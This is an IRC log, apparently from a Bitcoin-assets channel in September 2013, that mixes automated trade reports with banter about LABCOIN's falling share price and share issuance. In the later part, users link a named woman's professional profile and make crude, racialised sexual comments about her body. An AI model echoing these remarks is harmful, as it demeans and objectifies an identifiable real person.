1.1097 BTC [+] Sep 09 23:08:04 [BTCTC] [LABCOIN] 241 @ 0.0037 = 0.8917 BTC [+] Sep 09 23:08:15 about right :) Sep 09 23:09:00 [BTCTC] [LABCOIN] 59 @ 0.0037 = 0.2183 BTC [+] Sep 09 23:09:50 [BTCTC] [LABCOIN] 41 @ 0.003708 = 0.152 BTC [+] Sep 09 23:10:01 [MPEX] [S.MPOE] 9118 @ 0.00089433 = 8.1545 BTC [+] Sep 09 23:10:03 [MPEX] [S.MPOE] 700 @ 0.00089494 = 0.6265 BTC [+] Sep 09 23:10:04 [MPEX] [S.MPOE] 2082 @ 0.00089693 = 1.8674 BTC [+] Sep 09 23:10:18 [BTCTC] [ASICMINER-PT] 1 @ 2.456 BTC [-] Sep 09 23:10:33 [BTCTC] [LABCOIN] 748 @ 0.003708 = 2.7736 BTC [+] Sep 09 23:11:21 [BTCTC] [LABCOIN] 822 @ 0.003708 = 3.048 BTC [+] Sep 09 23:11:44 [BTCTC] [LABCOIN] 1 @ 0.003709 BTC [+] Sep 09 23:12:53 [BTCTC] [ACTIVEMINING] 214 @ 0.003395 = 0.7265 BTC [-] Sep 09 23:12:54 [BTCTC] [ACTIVEMINING] 10 @ 0.003396 = 0.034 BTC [+] Sep 09 23:12:55 [BTCTC] [ACTIVEMINING] 312 @ 0.003396 = 1.0596 BTC [+] Sep 09 23:12:56 [BTCTC] [ACTIVEMINING] 314 @ 0.003399 = 1.0673 BTC [+] Sep 09 23:12:57 [BTCTC] [ACTIVEMINING] 1500 @ 0.0034 = 5.1 BTC [+] Sep 09 23:13:00 retreat! Sep 09 23:13:12 [BTCTC] [LABCOIN] 1 @ 0.003645 BTC [-] Sep 09 23:13:13 [BTCTC] [LABCOIN] 10 @ 0.003581 = 0.0358 BTC [-] Sep 09 23:13:14 [BTCTC] [LABCOIN] 220 @ 0.003576 = 0.7867 BTC [-] Sep 09 23:13:16 [BTCTC] [LABCOIN] 440 @ 0.003575 = 1.573 BTC [-] Sep 09 23:13:17 [BTCTC] [LABCOIN] 100 @ 0.003561 = 0.3561 BTC [-] Sep 09 23:13:18 [BTCTC] [LABCOIN] 200 @ 0.00356 = 0.712 BTC [-] Sep 09 23:13:54 [BTCTC] [LABCOIN] 6 @ 0.003705 = 0.0222 BTC [+] Sep 09 23:14:35 [BTCTC] [LABCOIN] 1 @ 0.003699 BTC [-] Sep 09 23:15:20 [BTCTC] [LABCOIN] 20 @ 0.003576 = 0.0715 BTC [-] Sep 09 23:15:27 [BTCTC] [LABCOIN] 392 @ 0.003576 = 1.4018 BTC [-] Sep 09 23:15:34 [BTCTC] [LABCOIN] 985 @ 0.003556 = 3.5027 BTC [-] Sep 09 23:16:19 [BTCTC] [ACTIVEMINING] 70 @ 0.003485 = 0.244 BTC [+] Sep 09 23:16:20 [BTCTC] [ACTIVEMINING] 25 @ 0.0035 = 0.0875 BTC [+] Sep 09 23:16:21 [BTCTC] [ACTIVEMINING] 323 @ 0.003507 = 1.1328 BTC [+] Sep 09 23:16:23 [BTCTC] [ACTIVEMINING] 456 @ 0.003529 = 1.6092 BTC [+] Sep 09 23:16:24 [BTCTC] [ACTIVEMINING] 100 @ 0.003531 = 0.3531 BTC [+] Sep 09 23:17:42 [BTCTC] [COGNITIVE] 5 @ 0.297 = 1.485 BTC [-] Sep 09 23:18:09 [BTCTC] [LABCOIN] 1154 @ 0.00356 = 4.1082 BTC [+] Sep 09 23:18:10 [BTCTC] [LABCOIN] 800 @ 0.003558 = 2.8464 BTC [-] Sep 09 23:18:12 [BTCTC] [LABCOIN] 647 @ 0.003553 = 2.2988 BTC [-] Sep 09 23:18:13 [BTCTC] [LABCOIN] 1 @ 0.003552 BTC [-] Sep 09 23:18:13 [BTCTC] [LABCOIN] 5 @ 0.003552 = 0.0178 BTC [-] Sep 09 23:18:14 [BTCTC] [LABCOIN] 316 @ 0.003551 = 1.1221 BTC [-] Sep 09 23:18:16 [BTCTC] [LABCOIN] 543 @ 0.003551 = 1.9282 BTC [-] Sep 09 23:18:17 [BTCTC] [LABCOIN] 430 @ 0.00355 = 1.5265 BTC [-] Sep 09 23:18:18 [BTCTC] [LABCOIN] 1500 @ 0.003531 = 5.2965 BTC [-] Sep 09 23:18:19 [BTCTC] [LABCOIN] 1500 @ 0.003521 = 5.2815 BTC [-] Sep 09 23:18:20 [BTCTC] [LABCOIN] 1104 @ 0.00352 = 3.8861 BTC [-] Sep 09 23:18:22 [BTCTC] [LABCOIN] 1500 @ 0.003679 = 5.5185 BTC [+] Sep 09 23:18:23 [BTCTC] [COGNITIVE] 1 @ 0.296 BTC [-] Sep 09 23:18:41 [HAVELOCK] [AM100] 3 @ 0.0227 = 0.0681 BTC [-] Sep 09 23:18:43 [BTCTC] [COGNITIVE] 1 @ 0.296 BTC [-] Sep 09 23:18:44 [BTCTC] [COGNITIVE] 1 @ 0.295 BTC [-] Sep 09 23:18:45 [BTCTC] [COGNITIVE] 1 @ 0.293 BTC [-] Sep 09 23:18:46 [BTCTC] [COGNITIVE] 1 @ 0.291 BTC [-] Sep 09 23:18:58 [BTCTC] [LABCOIN] 280 @ 0.003558 = 0.9962 BTC [-] Sep 09 23:19:00 [BTCTC] [LABCOIN] 1896 @ 0.00352 = 6.6739 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 1 @ 0.00352 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 3486 @ 0.003435 = 11.9744 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 1396 @ 0.003434 = 4.7939 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 2000 @ 0.00343 = 6.86 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 1 @ 0.003429 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 539 @ 0.003428 = 1.8477 BTC [-] Sep 09 23:19:08 [BTCTC] [LABCOIN] 60 @ 0.0034 = 0.204 BTC [-] Sep 09 23:19:56 [BTCTC] [LABCOIN] 3 @ 0.003674 = 0.011 BTC [+] Sep 09 23:20:02 i guess this is a good time to link Sep 09 23:20:03 http://trilema.com/2013/but-please-allow-me-to-rub-it-in/ Sep 09 23:20:07 But please, allow me to rub it in pe Trilema - Un blog de Mircea Popescu. Sep 09 23:20:20 couldnt someone do analysis on the sales vs buys for Labcoin to see whether they are just selling off the "locked" shares over time? Sep 09 23:20:27 [BTCTC] [LABCOIN] 800 @ 0.003674 = 2.9392 BTC [+] Sep 09 23:20:28 tltr Sep 09 23:20:35 [BTCTC] [DMS.MINING] 6 @ 0.002524 = 0.0151 BTC [+] Sep 09 23:20:36 hm Sep 09 23:20:38 dexX7 you already read it cause it's mostly chanquote. Sep 09 23:20:43 i know :p Sep 09 23:20:45 lol Sep 09 23:20:58 tat that's not possible Sep 09 23:21:07 [BTCTC] [LABCOIN] 6 @ 0.003674 = 0.022 BTC [+] Sep 09 23:21:24 oh i see the bet bit :P, i'm honored to appear on your blog <3 Sep 09 23:21:26 [BTCTC] [LABCOIN] 250 @ 0.003674 = 0.9185 BTC [+] Sep 09 23:21:27 or i don't see the solution, but did think about something similar some time ago to "reconstruct" the number of issued shares Sep 09 23:21:47 wouldnt the sell volume be much higher than the buy? Sep 09 23:21:52 [BTCTC] [LABCOIN] 500 @ 0.003674 = 1.837 BTC [+] Sep 09 23:22:16 bids filled vs asks Sep 09 23:22:19 how would you reliably indentify "sell" volume from "buy" volume ? Sep 09 23:22:23 all trades are trades. Sep 09 23:22:28 [HAVELOCK] [AM100] 1 @ 0.02311 BTC [+] Sep 09 23:22:40 ^ yup Sep 09 23:22:42 [HAVELOCK] [AM100] 1 @ 0.02303 BTC [-] Sep 09 23:22:43 ther emust be some way Sep 09 23:22:48 + you can buy/sell shares to yourself Sep 09 23:22:58 [HAVELOCK] [AM100] 1 @ 0.02295 BTC [-] Sep 09 23:23:03 ThickAsThieves it's one of those things, like the cvadrature of the circle. Sep 09 23:23:16 [BTCTC] [LABCOIN] 1500 @ 0.003674 = 5.511 BTC [+] Sep 09 23:23:25 i understand Sep 09 23:23:47 [BTCTC] [LABCOIN] 9 @ 0.003511 = 0.0316 BTC [-] Sep 09 23:23:48 [BTCTC] [LABCOIN] 360 @ 0.003351 = 1.2064 BTC [-] Sep 09 23:23:50 [BTCTC] [LABCOIN] 720 @ 0.00335 = 2.412 BTC [-] Sep 09 23:23:51 [BTCTC] [LABCOIN] 367 @ 0.003331 = 1.2225 BTC [-] Sep 09 23:23:52 [BTCTC] [LABCOIN] 300 @ 0.00333 = 0.999 BTC [-] Sep 09 23:23:53 [BTCTC] [LABCOIN] 435 @ 0.00333 = 1.4486 BTC [-] Sep 09 23:23:53 "We think we gave enough evidence that our company and achievements are real to avoid being labeled as a "scam". Our company is sitting on valuable hardware and intellectual property and we're confident we will delivery nice performances to our shareholders. Sep 09 23:23:53 We will work on improving our communications as we settle on our final premise and have reached stability." Sep 09 23:23:54 [BTCTC] [LABCOIN] 5355 @ 0.00332 = 17.7786 BTC [-] Sep 09 23:23:55 [BTCTC] [LABCOIN] 300 @ 0.003311 = 0.9933 BTC [-] Sep 09 23:23:56 [BTCTC] [LABCOIN] 3505 @ 0.00331 = 11.6016 BTC [-] Sep 09 23:24:06 I thought that would fit well between the sells. Sep 09 23:24:08 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [+] Sep 09 23:24:12 kleeck_ which forumcompany is this one ? Sep 09 23:24:26 https://bitcointalk.org/index.php?topic=263445.msg3116538#msg3116538 Sep 09 23:24:34 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 09 23:24:36 ah ok Sep 09 23:24:44 [BTCTC] [LABCOIN] 540 @ 0.003671 = 1.9823 BTC [+] Sep 09 23:25:16 so im curious if the guy manages to somehow get enough btc cleared to stabilise this thing. Sep 09 23:25:39 he wont need to Sep 09 23:25:40 frankly it might be the move that puts btctc into fractional reserve mode if burnside doesn't cut the relationship up. Sep 09 23:25:45 seeing how he doesn't quite have THAT much btc. Sep 09 23:25:48 the believers are too far gone Sep 09 23:26:00 yeah but they kinda ran out of coins it seems. Sep 09 23:26:02 itll need to break 28 or so Sep 09 23:26:07 [BTCTC] [LABCOIN] 2946 @ 0.003599 = 10.6027 BTC [-] Sep 09 23:26:10 [BTCTC] [LABCOIN] 809 @ 0.0036 = 2.9124 BTC [+] Sep 09 23:26:13 [BTCTC] [LABCOIN] 1245 @ 0.0036 = 4.482 BTC [+] Sep 09 23:27:52 [BTCTC] [LABCOIN] 234 @ 0.003325 = 0.7781 BTC [-] Sep 09 23:28:12 [BTCTC] [DMS.MINING] 1 @ 0.002624 BTC [+] Sep 09 23:28:41 [BTCTC] [LABCOIN] 5000 @ 0.00336 = 16.8 BTC [+] Sep 09 23:28:43 [BTCTC] [LABCOIN] 3500 @ 0.00335 = 11.725 BTC [-] Sep 09 23:28:44 [BTCTC] [LABCOIN] 1500 @ 0.003325 = 4.9875 BTC [-] Sep 09 23:29:17 28 might be an optimistic number. Sep 09 23:29:33 [BTCTC] [LABCOIN] 150 @ 0.0035 = 0.525 BTC [+] Sep 09 23:30:17 labcoin price? Sep 09 23:30:36 lol Sep 09 23:31:40 [BTCTC] [LABCOIN] 100 @ 0.003325 = 0.3325 BTC [-] Sep 09 23:31:40 [BTCTC] [LABCOIN] 279 @ 0.003325 = 0.9277 BTC [-] Sep 09 23:31:40 [BTCTC] [LABCOIN] 558 @ 0.003324 = 1.8548 BTC [-] Sep 09 23:31:40 [BTCTC] [LABCOIN] 1495 @ 0.00331 = 4.9485 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 501 @ 0.003302 = 1.6543 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 1000 @ 0.003301 = 3.301 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 5 @ 0.0033 = 0.0165 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 248 @ 0.003261 = 0.8087 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 496 @ 0.00326 = 1.617 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 315 @ 0.003251 = 1.0241 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 30 @ 0.00325 = 0.0975 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 600 @ 0.00325 = 1.95 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 755 @ 0.003241 = 2.447 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 3250 @ 0.00324 = 10.53 BTC [-] Sep 09 23:31:41 [BTCTC] [LABCOIN] 368 @ 0.003232 = 1.1894 BTC [-] Sep 09 23:31:42 [BTCTC] [LABCOIN] 3337 @ 0.003232 = 10.7852 BTC [-] Sep 09 23:31:42 [BTCTC] [LABCOIN] 180 @ 0.003232 = 0.5818 BTC [-] Sep 09 23:31:45 [BTCTC] [LABCOIN] 293 @ 0.003232 = 0.947 BTC [-] Sep 09 23:31:51 [BTCTC] [LABCOIN] 1000 @ 0.003231 = 3.231 BTC [-] Sep 09 23:32:19 ^IMPLOSION! Sep 09 23:32:26 [BTCTC] [LABCOIN] 405 @ 0.003231 = 1.3086 BTC [-] Sep 09 23:32:27 [BTCTC] [LABCOIN] 1405 @ 0.003232 = 4.541 BTC [+] Sep 09 23:32:29 lol Sep 09 23:32:40 mircea_popescu: that was one lazy blog post Sep 09 23:32:57 [BTCTC] [LABCOIN] 15 @ 0.003449 = 0.0517 BTC [+] Sep 09 23:32:58 and people pay for it! what a scam :) Sep 09 23:33:10 [BTCTC] [LABCOIN] 4178 @ 0.00323 = 13.4949 BTC [-] Sep 09 23:33:12 hey where's my cut! :P Sep 09 23:33:13 about 1000btc in the bid book Sep 09 23:33:29 pankkake totally. but i blog with a view to 1 yearfrom now sort of thing Sep 09 23:33:41 in 2015 it may be one of my most cited. Sep 09 23:34:08 kleeck_ tons of people waiting to sell into any uptick it seems. Sep 09 23:34:22 [BTCTC] [LABCOIN] 75 @ 0.00339 = 0.2543 BTC [+] Sep 09 23:34:44 [BTCTC] [LABCOIN] 1500 @ 0.003389 = 5.0835 BTC [-] Sep 09 23:34:51 mircea_popescu: I should do that more often. I know I missed out on some stuff (not bitcoin related) by laziness Sep 09 23:34:54 [HAVELOCK] [VTX] 1 @ 0.56 BTC [-] Sep 09 23:35:26 yeah. there's a lot of value in just that : pick up the log, clean it of all the rest of the stuff and save it for later. Sep 09 23:35:37 it's about 55% compressed as published. Sep 09 23:35:53 [HAVELOCK] [VTX] 10 @ 0.555 = 5.55 BTC [-] Sep 09 23:35:56 oh yeah, a rant about how crappy a software was and how about the people praising it were wrong. well now they finally admit it and try to fix what was supposedly so great about it Sep 09 23:36:22 [BTCTC] [LABCOIN] 20 @ 0.003349 = 0.067 BTC [-] Sep 09 23:36:42 gotta blog with a view to the future. Sep 09 23:36:42 instead of trying to do it widely documented I should have just posted my hate :p Sep 09 23:36:45 [HAVELOCK] [VTX] 15 @ 0.555 = 8.325 BTC [-] Sep 09 23:36:59 [BTCTC] [LABCOIN] 430 @ 0.003349 = 1.4401 BTC [-] Sep 09 23:37:00 [BTCTC] [LABCOIN] 450 @ 0.00335 = 1.5075 BTC [+] Sep 09 23:37:02 [BTCTC] [LABCOIN] 20 @ 0.003388 = 0.0678 BTC [+] Sep 09 23:37:34 [BTCTC] [LABCOIN] 100 @ 0.003388 = 0.3388 BTC [+] Sep 09 23:37:50 [BTCTC] [LABCOIN] 25 @ 0.003276 = 0.0819 BTC [-] Sep 09 23:37:51 [BTCTC] [LABCOIN] 750 @ 0.003275 = 2.4563 BTC [-] Sep 09 23:37:53 [BTCTC] [LABCOIN] 25 @ 0.003232 = 0.0808 BTC [-] Sep 09 23:37:54 [BTCTC] [LABCOIN] 822 @ 0.00323 = 2.6551 BTC [-] Sep 09 23:37:55 [BTCTC] [LABCOIN] 250 @ 0.003226 = 0.8065 BTC [-] Sep 09 23:37:56 [BTCTC] [LABCOIN] 100 @ 0.003226 = 0.3226 BTC [-] Sep 09 23:37:58 [BTCTC] [LABCOIN] 2000 @ 0.003225 = 6.45 BTC [-] Sep 09 23:37:59 [BTCTC] [LABCOIN] 7 @ 0.003224 = 0.0226 BTC [-] Sep 09 23:38:00 [BTCTC] [LABCOIN] 25 @ 0.003224 = 0.0806 BTC [-] Sep 09 23:38:01 [BTCTC] [LABCOIN] 2000 @ 0.003223 = 6.446 BTC [-] Sep 09 23:38:02 [BTCTC] [LABCOIN] 100 @ 0.003222 = 0.3222 BTC [-] Sep 09 23:38:02 [BTCTC] [LABCOIN] 900 @ 0.003219 = 2.8971 BTC [-] Sep 09 23:38:03 [BTCTC] [LABCOIN] 100 @ 0.003211 = 0.3211 BTC [-] Sep 09 23:38:04 [BTCTC] [LABCOIN] 1150 @ 0.0032 = 3.68 BTC [-] Sep 09 23:38:06 [BTCTC] [LABCOIN] 10 @ 0.0032 = 0.032 BTC [-] Sep 09 23:38:07 [BTCTC] [LABCOIN] 12 @ 0.0032 = 0.0384 BTC [-] Sep 09 23:38:08 [BTCTC] [LABCOIN] 800 @ 0.003192 = 2.5536 BTC [-] Sep 09 23:38:09 [BTCTC] [LABCOIN] 924 @ 0.00317 = 2.9291 BTC [-] Sep 09 23:38:14 [BTCTC] [LABCOIN] 3 @ 0.003388 = 0.0102 BTC [+] Sep 09 23:38:29 ahh i'd pay for a webcam feed out of the rat's nest. Sep 09 23:39:49 Welp. Everyone back to AsicMiner... Nothing to see here. Sep 09 23:40:10 haha Sep 09 23:40:52 they wont Sep 09 23:41:03 theyll go to ActM or such Sep 09 23:41:13 Nah PetaHash Sep 09 23:41:14 haha Sep 09 23:41:16 they wanna gamble Sep 09 23:41:21 hopefully someone makes something stupid but new Sep 09 23:41:22 they wanna mak emoney by mistake Sep 09 23:41:25 lol petamine Sep 09 23:41:35 CatLab!!! Sep 09 23:41:37 We saught Bitcoin apart from The Friedcat and Lord Satoshi was not pleased. He looked down on us with great displeasure and crushed our share values and dividends with a great fury! Sep 09 23:41:45 it could have chicks dressed in cat costumes showing off the chips Sep 09 23:42:42 AM isn't sexy anymore, at most they will double their money Sep 09 23:42:52 haha at most Sep 09 23:42:55 greeeeedddd Sep 09 23:43:01 pfff, who wants to double your money when you can have pictures of chips? Sep 09 23:43:04 well thats not quite the case either Sep 09 23:43:14 how the ef will am double anything. Sep 09 23:43:31 i'll state for the record that the mpbor for the month is like 1% Sep 09 23:43:42 [BTCTC] [PETA-MINE] 1 @ 0.6599 BTC [+] Sep 09 23:43:49 PETAMINE! Sep 09 23:43:49 and that's not even a risk-free rate. it's just a scam free rate. Sep 09 23:43:52 FC is a ninja, i wouldn't bet against him (though i'm not saying i would currently bet on him :D) Sep 09 23:44:05 AM at 2btc was a decent mid- short- term buy Sep 09 23:44:18 but 2.3-2.5 where it is gets iffy Sep 09 23:44:42 the main thing you are playing against is a hardware lull Sep 09 23:44:44 as it stands it probably continues to pay 10% in dividends and drop 5% in price at regular intervals Sep 09 23:44:48 which is sorta rational. Sep 09 23:44:51 if FC dishes out even one .007 div Sep 09 23:45:02 then everyone will panic to 1.8 or less Sep 09 23:46:03 this is not trading advice Sep 09 23:46:06 :) Sep 09 23:46:29 [BTCTC] [ACTIVEMINING] 2 @ 0.003295 = 0.0066 BTC [-] Sep 09 23:46:30 [BTCTC] [ACTIVEMINING] 10 @ 0.003294 = 0.0329 BTC [-] Sep 09 23:46:32 [BTCTC] [ACTIVEMINING] 171 @ 0.003273 = 0.5597 BTC [-] Sep 09 23:46:32 [BTCTC] [ACTIVEMINING] 42 @ 0.00327 = 0.1373 BTC [-] Sep 09 23:46:33 [BTCTC] [ACTIVEMINING] 375 @ 0.003251 = 1.2191 BTC [-] Sep 09 23:46:34 [BTCTC] [ACTIVEMINING] 190 @ 0.00325 = 0.6175 BTC [-] Sep 09 23:46:57 [BTCTC] [LABCOIN] 40 @ 0.0032 = 0.128 BTC [-] Sep 09 23:47:15 [BTCTC] [LABCOIN] 5280 @ 0.003339 = 17.6299 BTC [+] Sep 09 23:47:16 [BTCTC] [LABCOIN] 1520 @ 0.00334 = 5.0768 BTC [+] Sep 09 23:47:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.02366 = 0.071 BTC [+] Sep 09 23:47:21 This 237 guy on the forums - The Swede? Sep 09 23:47:32 [BTCTC] [LABCOIN] 830 @ 0.00334 = 2.7722 BTC [+] Sep 09 23:47:35 [BTCTC] [LABCOIN] 9 @ 0.00319 = 0.0287 BTC [-] Sep 09 23:48:28 [BTCTC] [LABCOIN] 755 @ 0.003338 = 2.5202 BTC [+] Sep 09 23:48:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.02366 = 0.2366 BTC [+] Sep 09 23:48:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02366 = 0.0473 BTC [+] Sep 09 23:49:32 [BTCTC] [LABCOIN] 94 @ 0.00333 = 0.313 BTC [-] Sep 09 23:50:13 !t btctc labcoin Sep 09 23:50:14 [BTCT:LABCOIN] 1D: 0.00317 / 0.00361 / 0.003967 (389130 shares, 1405.4 BTC), 7D: 0.002971 / 0.00348 / 0.003967 (1438829 shares, 5005 BTC), 30D: 0.001219 / 0.00273 / 0.003978 (10006074 shares, 27364.8 BTC) Sep 09 23:50:16 lol at that thread, warning - while you were reading 50123018921230897 new replies have been posted Sep 09 23:50:20 [BTCTC] [LABCOIN] 5 @ 0.003329 = 0.0166 BTC [-] Sep 09 23:50:51 [BTCTC] [LABCOIN] 5 @ 0.00333 = 0.0167 BTC [+] Sep 09 23:50:52 [BTCTC] [LABCOIN] 5 @ 0.003336 = 0.0167 BTC [+] Sep 09 23:51:32 [BTCTC] [LABCOIN] 1 @ 0.003329 BTC [-] Sep 09 23:51:53 need to rename this channel #actm-fud-army Sep 09 23:51:59 [BTCTC] [LABCOIN] 2012 @ 0.003334 = 6.708 BTC [+] Sep 09 23:52:00 [BTCTC] [LABCOIN] 2007 @ 0.003335 = 6.6933 BTC [+] Sep 09 23:52:02 [BTCTC] [LABCOIN] 5 @ 0.003337 = 0.0167 BTC [+] Sep 09 23:52:03 [BTCTC] [LABCOIN] 300 @ 0.003399 = 1.0197 BTC [+] Sep 09 23:52:04 [BTCTC] [LABCOIN] 300 @ 0.0034 = 1.02 BTC [+] Sep 09 23:52:06 you guise are so mean Sep 09 23:52:23 dub no u Sep 09 23:52:25 We are destroyers. We destroy things. Sep 09 23:52:38 Like hopes and dreams. Also some kittens. Sep 09 23:52:39 This isn't a place for feelings Sep 09 23:52:56 okay so usagi disappeared some month+ ago, who do you think he became? Sep 09 23:52:57 Rulother sure it is. it's a place for feelings to come at night and get a nice gangbang. Sep 09 23:53:04 feelings have feelings too you know ? Sep 09 23:53:07 I dont want those feelings Sep 09 23:53:16 [BTCTC] [LABCOIN] 2000 @ 0.003639 = 7.278 BTC [+] Sep 09 23:53:17 [BTCTC] [LABCOIN] 1376 @ 0.00364 = 5.0086 BTC [+] Sep 09 23:53:18 ;;seen usagi Sep 09 23:53:18 usagi was last seen in #bitcoin-assets 4 weeks, 1 day, 2 hours, 54 minutes, and 27 seconds ago: I'm here to torment dub. he around? Sep 09 23:53:19 Rulother, is a Vulcan Robot. Sep 09 23:53:36 [BTCTC] [ASICMINER-PT] 1 @ 2.455 BTC [-] Sep 09 23:53:38 asic space heaters you guys Sep 09 23:53:46 ThickAsThieves: smidge Sep 09 23:53:56 but he left too Sep 09 23:54:02 ;;seen smidge Sep 09 23:54:03 smidge was last seen in #bitcoin-assets 3 weeks, 2 days, 9 hours, 41 minutes, and 14 seconds ago: if its up for you, can you tell me what the current ask price for MYMINER is, and the 7d average? Sep 09 23:54:04 ;;seen smidge Sep 09 23:54:04 smidge was last seen in #bitcoin-assets 3 weeks, 2 days, 9 hours, 41 minutes, and 15 seconds ago: if its up for you, can you tell me what the current ask price for MYMINER is, and the 7d average? Sep 09 23:54:10 he was here yesterday Sep 09 23:54:15 yeah Sep 09 23:54:17 he signs on sometimes Sep 09 23:54:19 Never hear him talk Sep 09 23:54:19 I can't wait to see these pictures! Sep 09 23:54:27 op got updated this week too Sep 09 23:54:28 i think sign in isn't enough, he has to say something Sep 09 23:55:03 also wondering which identities are vancleef Sep 09 23:55:10 anyone here actually owed btc by smidge or anything ? Sep 09 23:55:14 I like this picture http://i.minus.com/ibr4TeROc1X8Ya.gif Sep 09 23:55:15 the real mystery Sep 09 23:55:18 is Sep 09 23:55:21 ThickAsThieves he's bitsomething or the other Sep 09 23:55:21 i think the stringpuller is owed Sep 09 23:55:22 who is atlas these days Sep 09 23:55:35 ThickAsThieves wasn't that smickles and resolved a while back ? Sep 09 23:55:41 Rulother: a+ Sep 09 23:55:45 both still owe him Sep 09 23:55:52 afaik Sep 09 23:55:55 i doubt vancleef is smickles Sep 09 23:56:03 Rulother is that a picture of the aforementioned feelings ? Sep 09 23:56:12 yes Sep 09 23:56:21 mostly 'cause http://www.pattonboggs.com/professional/carol-vancleef Sep 09 23:56:23 but that picture does give me feelings Sep 09 23:56:24 else where Sep 09 23:56:58 no one thinks vancleef is smickles Sep 09 23:56:59 she's cute. azn tits tho. Sep 09 23:57:06 vancleef is AUS Sep 09 23:57:21 azn ass Sep 09 23:57:27 [HAVELOCK] [AM100] 10 @ 0.02290001 = 0.229 BTC [-] Sep 09 23:58:27 [BTCTC] [LABCOIN] 30 @ 0.003632 = 0.109 BTC [-] Sep 10 00:00:53 [BTCTC] [LABCOIN] 1 @ 0.00363 BTC [-] Sep 10 00:01:21 http://i.minus.com/ibtja6OEbpkfJg.gif Sep 10 00:01:26 from Labcoin thread Sep 10 00:01:37 oh there's the azn too Sep 10 00:01:53 lol Sep 10 00:02:01 [BTCTC] [LABCOIN] 1000 @ 0.00363 = 3.63 BTC [-] Sep 10 00:03:28 [BTCTC] [LABCOIN] 250 @ 0.00363 = 0.9075 BTC [-] Sep 10 00:03:51 [BTCTC] [LABCOIN] 500 @ 0.00363 = 1.815 BTC [-] Sep 10 00:04:26 [BTCTC] [LABCOIN] 7 @ 0.003629 = 0.0254 BTC [-] Sep 10 00:04:27 [BTCTC] [LABCOIN] 5 @ 0.003629 = 0.0181 BTC [-] Sep 10 00:04:28 [BTCTC] [LABCOIN] 588 @ 0.00363 = 2.1344 BTC [+] Sep 10 00:04:59 ThickAsThieves mpoe-pr thinks the gif's the best thing ever. Sep 10 00:05:14 should get some use Sep 10 00:05:22 [BTCTC] [LABCOIN] 13 @ 0.00363 = 0.0472 BTC [+] Sep 10 00:05:31 [BTCTC] [ACTIVEMINING] 10 @ 0.003291 = 0.0329 BTC [+] Sep 10 00:05:32 [BTCTC] [ACTIVEMINING] 150 @ 0.00329 = 0.4935 BTC [-] Sep 10 00:05:34 [BTCTC] [ACTIVEMINING] 37 @ 0.003287 = 0.1216 BTC [-] Sep 10 00:05:35 [BTCTC] [ACTIVEMINING] 2 @ 0.003272 = 0.0065 BTC [-] Sep 10 00:05:36 [BTCTC] [ACTIVEMINING] 948 @ 0.003251 = 3.0819 BTC [-] Sep 10 00:05:37 [BTCTC] [ACTIVEMINING] 273 @ 0.00325 = 0.8873 BTC [-] Sep 10 00:05:51 [BTCTC] [LABCOIN] 1 @ 0.003629 BTC [-] Sep 10 00:06:49 [MPEX] [S.MPOE] 4108 @ 0.00089693 = 3.6846 BTC [+] Sep 10 00:07:02 I like that azn Sep 10 00:07:06 cute belly button Sep 10 00:07:24 [BTCTC] [LABCOIN] 8 @ 0.003628 = 0.029 BTC [-] Sep 10 00:09:21 pankkake kinda babyfat. Sep 10 00:09:49 yeah, but I like it :) Sep 10 00:10:53 [BTCTC] [DMS.PURCHASE] 15 @ 0.01205 = 0.1808 BTC [+] Sep 10 00:11:17 i saw an azn horror movie where the lady put babies in her dumplings to live youthful Sep 10 00:11:23 obv it didnt pan out as planned Sep 10 00:11:41 heh Sep 10 00:12:10 dead baby porridge eh Sep 10 00:12:19 [BTCTC] [LABCOIN] 30 @ 0.003628 = 0.1088 BTC [-] Sep 10 00:12:50 [BTCTC] [ACTIVEMINING] 6 @ 0.003304 = 0.0198 BTC [+] Sep 10 00:12:51 [BTCTC] [ACTIVEMINING] 131 @ 0.003303 = 0.4327 BTC [-] Sep 10 00:12:53 [BTCTC] [ACTIVEMINING] 100 @ 0.0033 = 0.33 BTC [-] Sep 10 00:12:54 [BTCTC] [ACTIVEMINING] 594 @ 0.003251 = 1.9311 BTC [-] Sep 10 00:12:55 [BTCTC] [ACTIVEMINING] 284 @ 0.00325 = 0.923 BTC [-] Sep 10 00:13:01 those asians know how to make some unsettling horror though Sep 10 00:13:08 [BTCTC] [LABCOIN] 100 @ 0.003628 = 0.3628 BTC [-] Sep 10 00:13:09 [BTCTC] [DMS.MINING] 8 @ 0.002748 = 0.022 BTC [+] Sep 10 00:13:49 [BTCTC] [LABCOIN] 494 @ 0.003628 = 1.7922 BTC [-] Sep 10 00:13:52 [BTCTC] [LABCOIN] 506 @ 0.003628 = 1.8358 BTC [-] Sep 10 00:14:24 ThickAsThieves: ref lab shares, here is an example: issuer sells 10 shares into bids, the receiver waits till new bids are placed and sells those 10 shares again, the next receiver does the same thing.. now you have 30 "sell" trades, 0 "buy" trades. from the outside it might look like "30 shares in total", but actually there is no way to know how many shares there are. and 3M shares Sep 10 00:14:24 were transfered before burnside distributed the other 7M imo. Sep 10 00:14:47 [BTCTC] [LABCOIN] 200 @ 0.003628 = 0.7256 BTC [-] Sep 10 00:15:03 what do you mean transfered? Sep 10 00:15:55 [MPEX] [S.MPOE] 9300 @ 0.00089693 = 8.3414 BTC [+] Sep 10 00:15:59 "we sent 3 million shares to our dev accounts via the internal transfer on btct, those won't be sold and shall be considered as company shares" Sep 10 